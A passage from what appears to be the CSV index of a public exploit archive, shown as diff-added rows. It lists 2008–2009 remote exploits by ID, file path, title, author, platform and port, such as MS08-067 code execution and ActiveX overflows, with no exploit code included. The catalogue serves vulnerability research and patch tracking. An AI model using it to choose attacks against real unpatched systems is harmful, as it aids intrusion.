Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,remote,windows, +5746,exploits/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,remote,windows, +5747,exploits/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,remote,windows, +5750,exploits/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,remote,windows, +5751,exploits/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote Overflow (SEH)",2008-06-06,ryujin,remote,windows,22 +5777,exploits/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,remote,windows, +5778,exploits/windows/remote/5778.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow (2)",2008-06-10,shinnai,remote,windows, +5790,exploits/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",remote,multiple,161 +5793,exploits/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,remote,windows, +5795,exploits/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,remote,windows, +5827,exploits/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,remote,windows,4000 +5926,exploits/hardware/remote/5926.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)",2008-06-24,meathive,remote,hardware, +6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",remote,windows, +6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,remote,windows,80 +6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx, +6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80 +6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80 +6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux, +6100,exploits/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,win_x86,80 +6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows, +6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows, +6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,remote,windows, +6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,remote,multiple, +6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",remote,multiple, +6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,remote,windows, +6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",remote,multiple, +6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,remote,windows, +6152,exploits/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,remote,windows, +6155,exploits/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB)",2008-07-29,"Andy Davis",remote,hardware, +6175,exploits/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,remote,windows, +6195,exploits/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,remote,windows, +6217,exploits/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,remote,windows, +6220,exploits/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",remote,windows, +6227,exploits/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",remote,windows, +6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",remote,multiple, +6236,exploits/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning",2008-08-13,Zbr,remote,multiple, +6238,exploits/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,remote,windows, +6248,exploits/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,remote,windows,21 +6256,exploits/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",remote,windows, +6278,exploits/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",remote,windows, +6302,exploits/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",remote,windows, +6305,exploits/hardware/remote/6305.html,"Belkin Wireless G Router / ADSL2 Modem - Authentication Bypass",2008-08-25,noensr,remote,hardware, +6317,exploits/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow",2008-08-26,Koshi,remote,windows, +6318,exploits/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,remote,windows, +6323,exploits/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,remote,windows, +6324,exploits/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution",2008-08-28,spdr,remote,windows, +6328,exploits/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Command Execution",2008-08-29,Andi,remote,solaris, +6334,exploits/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files",2008-08-30,spdr,remote,windows, +6355,exploits/windows/remote/6355.txt,"Google Chrome 0.2.149.27 - Automatic File Download",2008-09-03,nerex,remote,windows, +6366,exploits/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,remote,hardware, +6367,exploits/windows/remote/6367.txt,"Google Chrome 0.2.149.27 - 'SaveAs' Remote Buffer Overflow",2008-09-05,SVRT,remote,windows, +6387,exploits/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",remote,windows,2022 +6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,remote,windows, +6414,exploits/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",remote,windows, +6454,exploits/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,remote,windows, +6476,exploits/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",remote,hardware, +6477,exploits/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",remote,hardware, +6491,exploits/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,remote,windows, +6506,exploits/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",remote,windows, +6532,exploits/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,remote,hardware, +6537,exploits/windows/remote/6537.html,"Chilkat XML - ActiveX Arbitrary File Creation/Execution",2008-09-23,shinnai,remote,windows, +6548,exploits/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,remote,windows, +6570,exploits/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",remote,windows, +6600,exploits/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service",2008-09-27,e.wiZz!,remote,windows, +6630,exploits/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution",2008-09-30,Nine:Situations:Group,remote,windows, +6638,exploits/windows/remote/6638.html,"GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec",2008-09-30,EgiX,remote,windows, +6656,exploits/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)",2008-10-02,Ac!dDrop,remote,windows, +6661,exploits/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,remote,windows, +6666,exploits/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,remote,windows, +6686,exploits/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",remote,windows, +6690,exploits/windows/remote/6690.html,"Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,remote,windows, +6699,exploits/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,remote,windows, +6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",remote,hardware, +6773,exploits/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,remote,windows, +6774,exploits/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,remote,windows, +6776,exploits/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,remote,windows, +6786,exploits/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution",2008-10-19,kingcope,remote,solaris,111 +6793,exploits/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,remote,windows, +6801,exploits/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",remote,windows, +6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,remote,windows,22 +6813,exploits/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",remote,windows, +6828,exploits/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,remote,windows, +6840,exploits/windows/remote/6840.html,"PowerTCP FTP Module - Multiple Techniques (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",remote,windows, +6841,exploits/windows/remote/6841.txt,"Microsoft Windows Server - Universal Code Execution (MS08-067)",2008-10-26,EMM,remote,windows,135 +6870,exploits/windows/remote/6870.html,"MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method",2008-10-29,DeltahackingTEAM,remote,windows, +6871,exploits/windows/remote/6871.html,"MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method",2008-10-29,DeltahackingTEAM,remote,windows, +6872,exploits/windows/remote/6872.html,"MW6 Datamatrix - ActiveX 'Datamatrix.dll' Insecure Method",2008-10-29,DeltahackingTEAM,remote,windows, +6873,exploits/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method",2008-10-29,DeltahackingTEAM,remote,windows, +6875,exploits/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",remote,windows, +6878,exploits/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",remote,windows, +6880,exploits/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",remote,windows, +6899,exploits/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",remote,hardware, +6921,exploits/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API (Metasploit)",2008-11-01,"Kevin Finisterre",remote,windows, +6963,exploits/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,remote,windows, +7055,exploits/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,remote,hardware, +7056,exploits/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",remote,windows, +7104,exploits/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,remote,windows,135 +7125,exploits/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)",2008-11-14,"Andres Tarasco",remote,windows, +7132,exploits/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",remote,windows,445 +7142,exploits/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation",2008-11-17,Zigma,remote,windows, +7145,exploits/windows/remote/7145.txt,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,remote,windows, +7151,exploits/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,remote,linux, +7167,exploits/windows/remote/7167.html,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,remote,windows, +7181,exploits/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - URI handler Remote Command Execution",2008-11-21,Nine:Situations:Group,remote,windows, +7183,exploits/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,remote,linux, +7196,exploits/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)",2008-11-23,"Jerome Athias",remote,windows, +7355,exploits/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - 'Site' Command Injection",2008-12-05,"Tan Chew Keong",remote,windows, +7384,exploits/windows/remote/7384.txt,"XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)",2008-12-08,"Michael Brooks",remote,windows, +7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware, +7402,exploits/windows/remote/7402.html,"EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Remote Buffer Overflow",2008-12-09,e.wiZz!,remote,windows, +7403,exploits/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow",2008-12-10,"Guido Landi",remote,windows, +7410,exploits/windows/remote/7410.html,"Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow",2008-12-10,muts,remote,windows, +7442,exploits/windows/remote/7442.txt,"TmaxSoft JEUS - Alternate Data Streams File Disclosure",2008-12-12,"Simon Ryeo",remote,windows, +7452,exploits/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow",2008-12-14,SkD,remote,windows,69 +7477,exploits/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (1)",2008-12-15,krafty,remote,windows, +7496,exploits/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection",2008-12-16,"Marian Ventuneac",remote,hardware, +7505,exploits/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution",2008-12-17,e.wiZz!,remote,windows, +7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,remote,windows, +7566,exploits/windows/remote/7566.html,"Google Chrome - 'ChromeHTML://' Remote Parameter Injection",2008-12-23,Nine:Situations:Group,remote,windows, +7583,exploits/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (2)",2008-12-28,"Jeremy Brown",remote,windows, +7584,exploits/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 (Windows Vista) - Remote Buffer Overflow",2008-12-28,SkD,remote,windows, +7594,exploits/windows/remote/7594.html,"Chilkat FTP - ActiveX (SaveLastError) Insecure Method",2008-12-28,callAX,remote,windows, +7617,exploits/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer Overflow",2008-12-29,callAX,remote,windows, +7623,exploits/windows/remote/7623.html,"Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection",2008-12-30,Nine:Situations:Group,remote,windows, +7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,remote,windows, +7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,remote,linux,445 +7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,remote,windows, +7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware, +7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",remote,windows, +7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, +7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows, +7749,exploits/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,remote,windows, +7755,exploits/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,remote,windows, +7757,exploits/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote Command Execution",2009-01-13,Stack,remote,windows, +7760,exploits/multiple/remote/7760.php,"TeamSpeak 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,remote,multiple, +7762,exploits/windows/remote/7762.html,"EDraw Office Viewer 5.4 - 'HttpDownloadFile()' Insecure Method",2009-01-14,Cyber-Zone,remote,windows, +7763,exploits/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution",2009-01-14,Stack,remote,windows, +7779,exploits/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite",2009-01-14,Houssamix,remote,windows, +7781,exploits/multiple/remote/7781.txt,"Oracle Secure Backup 10g - 'exec_qr()' Command Injection",2009-01-14,"Joxean Koret",remote,multiple, +7794,exploits/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite",2009-01-15,"Alfons Luja",remote,windows, +7804,exploits/windows/remote/7804.html,"MetaProducts MetaTreeX 1.5.100 - ActiveX File Overwrite",2009-01-16,Houssamix,remote,windows, +7826,exploits/windows/remote/7826.html,"SmartVmd ActiveX 1.1 - Remote File Overwrite",2009-01-19,Houssamix,remote,windows, +7827,exploits/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion",2009-01-19,Houssamix,remote,windows, +7842,exploits/windows/remote/7842.html,"Mozilla Firefox 3.0.5 - Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,remote,windows, +7845,exploits/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,remote,hardware, +7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware, +7868,exploits/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite",2009-01-26,Houssamix,remote,windows, +7871,exploits/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation",2009-01-26,Stack,remote,windows, +7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21 +7903,exploits/windows/remote/7903.html,"Google Chrome 1.0.154.43 - Clickjacking",2009-01-28,x0x,remote,windows, +7910,exploits/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",remote,windows, +7912,exploits/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,remote,windows, +7913,exploits/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,remote,windows,21 +7915,exploits/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting",2009-01-29,"Usman Saeed",remote,hardware, +7918,exploits/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",remote,windows, +7919,exploits/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",remote,windows, +7920,exploits/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",remote,hardware, +7921,exploits/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - Cross-Site Request Forgery",2009-01-29,"Michael Brooks",remote,hardware, +7926,exploits/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,remote,windows, +7928,exploits/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,remote,windows, +7935,exploits/windows/remote/7935.html,"Google Chrome 1.0.154.46 - '(ChromeHTML://)' Injection (PoC)",2009-01-30,waraxe,remote,windows, +7966,exploits/windows/remote/7966.txt,"NaviCOPA Web Server 3.0.1 - Remote Buffer Overflow / Script Source Disclosure",2009-02-03,e.wiZz!,remote,windows, +7988,exploits/windows/remote/7988.pl,"Amaya Web Browser 11 (Windows XP) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",remote,windows, +7989,exploits/windows/remote/7989.pl,"Amaya Web Browser 11 (Windows Vista) - bdo tag Remote Stack Overflow",2009-02-04,"Rob Carter",remote,windows, +8022,exploits/hardware/remote/8022.txt,"3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass",2009-02-09,ikki,remote,hardware, +8023,exploits/hardware/remote/8023.txt,"ZeroShell 1.0beta11 - Remote Code Execution",2009-02-09,ikki,remote,hardware, +8037,exploits/multiple/remote/8037.txt,"ProFTPd - 'mod_mysql' Authentication Bypass",2009-02-10,gat3way,remote,multiple, +8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",remote,windows, +8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption (PoC)",2009-02-16,Nine:Situations:Group,remote,windows, +8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,remote,windows, +8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",remote,windows, +8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (PoC) (MS09-002)",2009-02-20,webDEViL,remote,windows, +8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware, +8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",remote,multiple, +8117,exploits/windows/remote/8117.pl,"POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)",2009-02-27,"Jeremy Brown",remote,windows, +8118,exploits/windows/remote/8118.html,"Orbit Downloader 2.8.4 - 'Hostname' Remote Buffer Overflow",2009-02-27,JavaGuru,remote,windows, +8142,exploits/windows/remote/8142.py,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (SEH)",2009-03-03,His0k4,remote,windows,80 +8143,exploits/windows/remote/8143.html,"Sopcast SopCore Control - 'sopocx.ocx' Command Execution",2009-03-03,Nine:Situations:Group,remote,windows, +8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,remote,windows, +8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,remote,windows, +8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",remote,windows, +8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,remote,windows,80 +8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,remote,windows, +8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,remote,windows, +8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,remote,windows, +8191,exploits/multiple/remote/8191.txt,"NextApp Echo < 2.1.1 - XML Injection",2009-03-10,"SEC Consult",remote,multiple, +8200,exploits/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files",2009-03-10,"Jonathan Salwan",remote,windows, +8203,exploits/windows/remote/8203.pl,"POP Peeper 3.4.0.0 - Date Remote Buffer Overflow",2009-03-12,"Jeremy Brown",remote,windows, +8206,exploits/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access",2009-03-13,Nine:Situations:Group,remote,windows, +8208,exploits/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - 'MrvBarCd.dll' Insecure Method",2009-03-13,Cyber-Zone,remote,windows, +8211,exploits/windows/remote/8211.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories",2009-03-16,"Jonathan Salwan",remote,windows, +8215,exploits/windows/remote/8215.txt,"PPLive 1.9.21 - '/LoadModule' URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,remote,windows, +8227,exploits/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,remote,windows, +8248,exploits/windows/remote/8248.py,"POP Peeper 3.4.0.0 - 'From' Remote Buffer Overflow (SEH)",2009-03-20,His0k4,remote,windows, +8253,exploits/windows/remote/8253.c,"Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow",2009-03-20,"fl0 fl0w",remote,windows, +8256,exploits/windows/remote/8256.c,"Sysax Multi Server 4.3 - Arbitrary Delete Files Expoit",2009-03-23,"Jonathan Salwan",remote,windows, +8257,exploits/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion",2009-03-23,waraxe,remote,windows, +8269,exploits/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",remote,hardware, +8273,exploits/windows/remote/8273.c,"Telnet-Ftp Service Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-23,"Jonathan Salwan",remote,windows, +8283,exploits/windows/remote/8283.c,"Femitter FTP Server 1.x - Multiple Authenticated Vulnerabilities",2009-03-24,"Jonathan Salwan",remote,windows, 